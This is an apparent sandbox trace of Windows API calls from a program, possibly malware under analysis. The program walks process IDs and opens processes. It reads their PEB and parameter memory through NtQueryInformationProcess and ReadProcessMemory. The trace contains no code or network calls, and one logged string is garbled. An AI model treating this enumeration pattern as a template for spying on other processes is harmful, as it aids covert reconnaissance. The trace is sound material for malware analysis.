[0411.040] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0
[0411.041] CloseHandle (hObject=0x0) returned 0
[0411.042] _ui64tow (_Value=0x1d8, _Buffer="428", _Radix=10) returned="472"
[0411.050] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="472") returned 3
[0411.051] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.051] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.071] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0
[0411.071] CloseHandle (hObject=0x0) returned 0
[0411.072] _ui64tow (_Value=0x1e0, _Buffer="472", _Radix=10) returned="480"
[0411.076] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="480") returned 3
[0411.077] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.077] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.097] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0
[0411.097] CloseHandle (hObject=0x0) returned 0
[0411.098] _ui64tow (_Value=0x1e8, _Buffer="480", _Radix=10) returned="488"
[0411.102] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="488") returned 3
[0411.103] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.103] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.124] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0
[0411.124] CloseHandle (hObject=0x0) returned 0
[0411.125] _ui64tow (_Value=0x254, _Buffer="488", _Radix=10) returned="596"
[0411.130] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="596") returned 3
[0411.131] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.131] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x0
[0411.154] CloseHandle (hObject=0x0) returned 0
[0411.154] _ui64tow (_Value=0x298, _Buffer="596", _Radix=10) returned="664"
[0411.159] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="664") returned 3
[0411.160] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.160] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.184] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0
[0411.184] CloseHandle (hObject=0x0) returned 0
[0411.185] _ui64tow (_Value=0x2c8, _Buffer="664", _Radix=10) returned="712"
[0411.189] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="712") returned 3
[0411.191] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.191] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0
[0411.211] CloseHandle (hObject=0x0) returned 0
[0411.212] _ui64tow (_Value=0x338, _Buffer="712", _Radix=10) returned="824"
[0411.217] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="824") returned 3
[0411.218] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.218] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0
[0411.249] CloseHandle (hObject=0x0) returned 0
[0411.250] _ui64tow (_Value=0x36c, _Buffer="824", _Radix=10) returned="876"
[0411.254] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="876") returned 3
[0411.255] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.255] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.281] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x0
[0411.281] CloseHandle (hObject=0x0) returned 0
[0411.282] _ui64tow (_Value=0x3fc, _Buffer="876", _Radix=10) returned="1020"
[0411.287] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1020") returned 4
[0411.288] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.288] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.310] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3fc) returned 0x0
[0411.311] CloseHandle (hObject=0x0) returned 0
[0411.311] _ui64tow (_Value=0x3d0, _Buffer="1020", _Radix=10) returned="976"
[0411.316] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="976") returned 3
[0411.317] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.317] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.339] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d0) returned 0x24c
[0411.340] GetLastError () returned 0x0
[0411.340] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.340] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdb018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.340] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.340] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3327f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.341] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x332688, lpBuffer=0x12dd100, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.342] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.343] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.343] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdb020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.343] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x331e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.343] malloc (_Size=0x3e) returned 0x2bd180
[0411.343] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3326c0, lpBuffer=0x2bd180, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bd180*, lpNumberOfBytesRead=0x0) returned 1
[0411.343] free (_Block=0x2bd180)
[0411.344] CloseHandle (hObject=0x24c) returned 1
[0411.345] _ui64tow (_Value=0x410, _Buffer="976", _Radix=10) returned="1040"
[0411.349] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1040") returned 4
[0411.350] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.350] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.388] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x410) returned 0x0
[0411.388] CloseHandle (hObject=0x0) returned 0
[0411.389] _ui64tow (_Value=0x470, _Buffer="1040", _Radix=10) returned="1136"
[0411.395] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1136") returned 4
[0411.396] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.396] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.420] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x470) returned 0x0
[0411.420] CloseHandle (hObject=0x0) returned 0
[0411.421] _ui64tow (_Value=0x490, _Buffer="1136", _Radix=10) returned="1168"
[0411.426] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1168") returned 4
[0411.427] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.427] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.512] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x490) returned 0x24c
[0411.512] GetLastError () returned 0x0
[0411.512] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.512] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffd6018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.513] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.513] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2d27c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.513] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2d2688, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.514] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.515] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.515] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffd6020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2d1e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.516] malloc (_Size=0x20) returned 0x2bfe40
[0411.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2d26ca, lpBuffer=0x2bfe40, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bfe40*, lpNumberOfBytesRead=0x0) returned 1
[0411.516] free (_Block=0x2bfe40)
[0411.517] CloseHandle (hObject=0x24c) returned 1
[0411.518] _ui64tow (_Value=0x4b0, _Buffer="1168", _Radix=10) returned="1200"
[0411.523] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1200") returned 4
[0411.525] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.525] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.549] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4b0) returned 0x0
[0411.549] CloseHandle (hObject=0x0) returned 0
[0411.550] _ui64tow (_Value=0x778, _Buffer="1200", _Radix=10) returned="1912"
[0411.555] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1912") returned 4
[0411.578] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.578] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.600] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x778) returned 0x24c
[0411.600] GetLastError () returned 0x0
[0411.600] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x262820, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2626a6, lpBuffer=0x12dd100, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.602] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.603] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x261e90, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.604] malloc (_Size=0x32) returned 0x2be140
[0411.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2626d6, lpBuffer=0x2be140, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2be140*, lpNumberOfBytesRead=0x0) returned 1
[0411.604] free (_Block=0x2be140)
[0411.605] CloseHandle (hObject=0x24c) returned 1
[0411.606] _ui64tow (_Value=0x628, _Buffer="1912", _Radix=10) returned="1576"
[0411.611] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1576") returned 4
[0411.612] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.612] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.632] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x628) returned 0x0
[0411.632] CloseHandle (hObject=0x0) returned 0
[0411.632] _ui64tow (_Value=0x2b0, _Buffer="1576", _Radix=10) returned="688"
[0411.636] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="688") returned 3
[0411.638] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.638] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2b0) returned 0x0
[0411.694] CloseHandle (hObject=0x0) returned 0
[0411.695] _ui64tow (_Value=0x6a4, _Buffer="688", _Radix=10) returned="1700"
[0411.700] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1700") returned 4
[0411.701] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.701] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.724] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a4) returned 0x0
[0411.725] CloseHandle (hObject=0x0) returned 0
[0411.726] _ui64tow (_Value=0x73c, _Buffer="1700", _Radix=10) returned="1852"
[0411.731] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1852") returned 4
[0411.732] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.732] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.779] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x73c) returned 0x24c
[0411.779] GetLastError () returned 0x0
[0411.779] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.779] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.780] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.780] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1d29e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.780] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1d2796, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.782] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.783] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
